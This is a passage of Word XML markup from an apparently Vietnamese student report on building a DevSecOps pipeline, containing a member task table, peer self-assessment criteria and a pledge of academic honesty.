              <w:t>Kiểm soát dữ liệu xác thực, phát hiện chuỗi hardcoded credentials, cấu hình Quality Gate SonarQube chặn mã nguồn và thiết lập băm Bcrypt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2925"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Đào Xuân Mạnh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoàn thành</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="562"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4459"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Xây dựng bộ công cụ kiểm thử cấu hình tĩnh 21 trường hợp (ci/validate_configs.py), thiết lập kịch bản phân lập mạng Docker Compose và đóng cổng CSDL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2925"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Lê Đức Anh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoàn thành</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="562"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4459"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Thiết lập cụm quan sát tập trung Promtail, Loki, Grafana; xây dựng 8 panel LogQL an ninh thời gian thực, cấu hình tự phục hồi container Autoheal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2925"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nguyễn Phương Mai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoàn thành</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E0F3BFB" w14:textId="297CFF0D" w:rsidR="00E10AD7" w:rsidRDefault="00E10AD7" w:rsidP="00E10AD7">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B2A12E" w14:textId="3B6FC6C4" w:rsidR="00704F00" w:rsidRPr="00B6285A" w:rsidRDefault="00704F00" w:rsidP="00B6285A">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00274447">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NHÓM THỰC HIỆN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> TỰ ĐÁNH GIÁ</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562"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="1276"/>
        <w:gridCol w:w="1417"/>
        <w:gridCol w:w="1417"/>
        <w:gridCol w:w="1417"/>
        <w:gridCol w:w="1417"/>
      </w:tblGrid>
      <w:tr w:rsidR="00704F00" w:rsidRPr="00E10AD7" w14:paraId="0B557AEF" w14:textId="01523E66" w:rsidTr="00D8007E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CDE2C30" w14:textId="77777777" w:rsidR="00704F00" w:rsidRPr="00E10AD7" w:rsidRDefault="00704F00" w:rsidP="00DA474C">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E10AD7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72521C67" w14:textId="5ACCA781" w:rsidR="00704F00" w:rsidRPr="00E10AD7" w:rsidRDefault="00704F00" w:rsidP="00DA474C">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SV thực hiện</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53189C12" w14:textId="46097267" w:rsidR="00704F00" w:rsidRPr="00E10AD7" w:rsidRDefault="00704F00" w:rsidP="00DA474C">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Thái độ tham gia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="722833BB" w14:textId="22342EEA" w:rsidR="00704F00" w:rsidRPr="00E10AD7" w:rsidRDefault="00704F00" w:rsidP="00DA474C">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mức hoàn thành CV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7301618C" w14:textId="018C4CAD" w:rsidR="00704F00" w:rsidRPr="00E10AD7" w:rsidRDefault="00704F00" w:rsidP="00DA474C">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Kỹ năng giao tiếp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="718C3509" w14:textId="0D99A9B7" w:rsidR="00704F00" w:rsidRDefault="00704F00" w:rsidP="00DA474C">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Kỹ năng hợp tác</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B307259" w14:textId="463623F0" w:rsidR="00704F00" w:rsidRDefault="00704F00" w:rsidP="00DA474C">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Kỹ năng lãnh đạo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="562"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1843"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nguyễn Giang Nam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1276"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="562"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1843"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nguyễn Đình Hải</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1276"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="562"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1843"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Đào Xuân Mạnh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1276"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="562"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1843"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Lê Đức Anh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1276"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="562"/>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843"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nguyễn Phương Mai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1276"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B515ABB" w14:textId="6A025BFA" w:rsidR="00E10AD7" w:rsidRDefault="005A00C7" w:rsidP="00B6285A">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A00C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ghi chú</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0004B212" w14:textId="1A999ABE" w:rsidR="005A00C7" w:rsidRDefault="005A00C7" w:rsidP="005A00C7">
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
      </w:pPr>
      <w:r w:rsidRPr="005A00C7">
        <w:t>Thái độ tham gia</w:t>
      </w:r>
      <w:r>
        <w:t>: Đánh giá điểm thái độ tham gia công việc chung của nhóm (từ 0: không tham gia, đến 5: chủ động, tích cực).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C5A8DF" w14:textId="7BDE056C" w:rsidR="005A00C7" w:rsidRDefault="005A00C7" w:rsidP="005A00C7">
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
      </w:pPr>
      <w:r w:rsidRPr="005A00C7">
        <w:t>Mức hoàn thành CV</w:t>
      </w:r>
      <w:r>
        <w:t>: Đánh giá điểm m</w:t>
      </w:r>
      <w:r w:rsidRPr="005A00C7">
        <w:t xml:space="preserve">ức </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">độ </w:t>
      </w:r>
      <w:r w:rsidRPr="005A00C7">
        <w:t xml:space="preserve">hoàn thành </w:t>
      </w:r>
      <w:r>
        <w:t>công việc được giao (từ 0: không hoàn thành, đến 5: hoàn thành xuất sắc).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A8802A" w14:textId="405A0DA3" w:rsidR="005A00C7" w:rsidRDefault="005A00C7" w:rsidP="005A00C7">
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
      </w:pPr>
      <w:r w:rsidRPr="005A00C7">
        <w:t>Kỹ năng giao tiếp</w:t>
      </w:r>
      <w:r>
        <w:t>: Đánh giá điểm khả năng tương tác, giao tiếp trong nhóm (từ 0: không hoặc giao tiếp rất yếu, đến 5: giao tiếp xuất sắc).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C84D4" w14:textId="1DBF1B19" w:rsidR="005A00C7" w:rsidRDefault="005A00C7" w:rsidP="005A00C7">
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
      </w:pPr>
      <w:r w:rsidRPr="005A00C7">
        <w:t>Kỹ năng hợp tác</w:t>
      </w:r>
      <w:r>
        <w:t>: Đánh giá điểm khả năng hợp tác, hỗ trợ lẫn nhau</w:t>
      </w:r>
      <w:r w:rsidR="00942225">
        <w:t>, giải quyết mâu thuẫn, xung đột</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778F7C6E" w14:textId="13A5A7D6" w:rsidR="005A00C7" w:rsidRPr="00AE47E8" w:rsidRDefault="005A00C7" w:rsidP="005A00C7">
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
      </w:pPr>
      <w:r w:rsidRPr="005A00C7">
        <w:t>Kỹ năng lãnh đạo</w:t>
      </w:r>
      <w:r w:rsidR="00942225">
        <w:t>: Đánh giá điểm khả năng lãnh đạo (từ 0: không có khả năng lãnh đạo, đến 5: có khả năng lãnh đạo tốt, tổ chức và điều phối công việc trong nhóm hiệu quả).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517925AD" w14:textId="77777777" w:rsidR="00D43DF5" w:rsidRDefault="00D43DF5" w:rsidP="00D43DF5">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5C76A0" w14:textId="023FE106" w:rsidR="00D43DF5" w:rsidRDefault="00D43DF5">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A85142" w14:textId="5439871F" w:rsidR="00D43DF5" w:rsidRPr="008425EB" w:rsidRDefault="00D43DF5" w:rsidP="008425EB">
      <w:pPr>
        <w:pStyle w:val="CTDT-H0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc182409056"/>
      <w:r w:rsidRPr="008425EB">
        <w:lastRenderedPageBreak/>
        <w:t>LỜI CAM ĐOAN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="509E882C" w14:textId="11E168F4" w:rsidR="00D43DF5" w:rsidRDefault="004828F5" w:rsidP="00D43DF5">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Chúng em xin cam đoan rằng đây là báo cáo bài tập lớn do nhóm sinh viên thực hiện dưới sự hướng dẫn của giảng viên phụ trách học phần. Các nội dung nghiên cứu, thiết kế kiến trúc đường ống DevSecOps, triển khai hạ tầng đám mây và kết quả thực nghiệm trong báo cáo này là hoàn toàn trung thực và do các thành viên trong nhóm trực tiếp nghiên cứu, lập trình và vận hành trên hệ thống máy chủ thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F29495C" w14:textId="6AF82DB9" w:rsidR="00635D1E" w:rsidRDefault="00D43DF5" w:rsidP="00D43DF5">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nếu </w:t>
      </w:r>
      <w:r w:rsidR="008425EB">
        <w:t xml:space="preserve">bị </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">phát hiện có bất kỳ sự gian lận nào </w:t>
      </w:r>
      <w:r w:rsidR="004828F5">
        <w:t>các thành viên trong nhóm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> xin hoàn toàn chịu trách nhiệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14927DFE" w14:textId="77777777" w:rsidR="00635D1E" w:rsidRDefault="00635D1E" w:rsidP="00D43DF5">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182F7886" w14:textId="77777777" w:rsidR="00635D1E" w:rsidRDefault="00635D1E">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="702F78E1" w14:textId="4E75E1F0" w:rsidR="00635D1E" w:rsidRPr="008425EB" w:rsidRDefault="00635D1E" w:rsidP="008425EB">
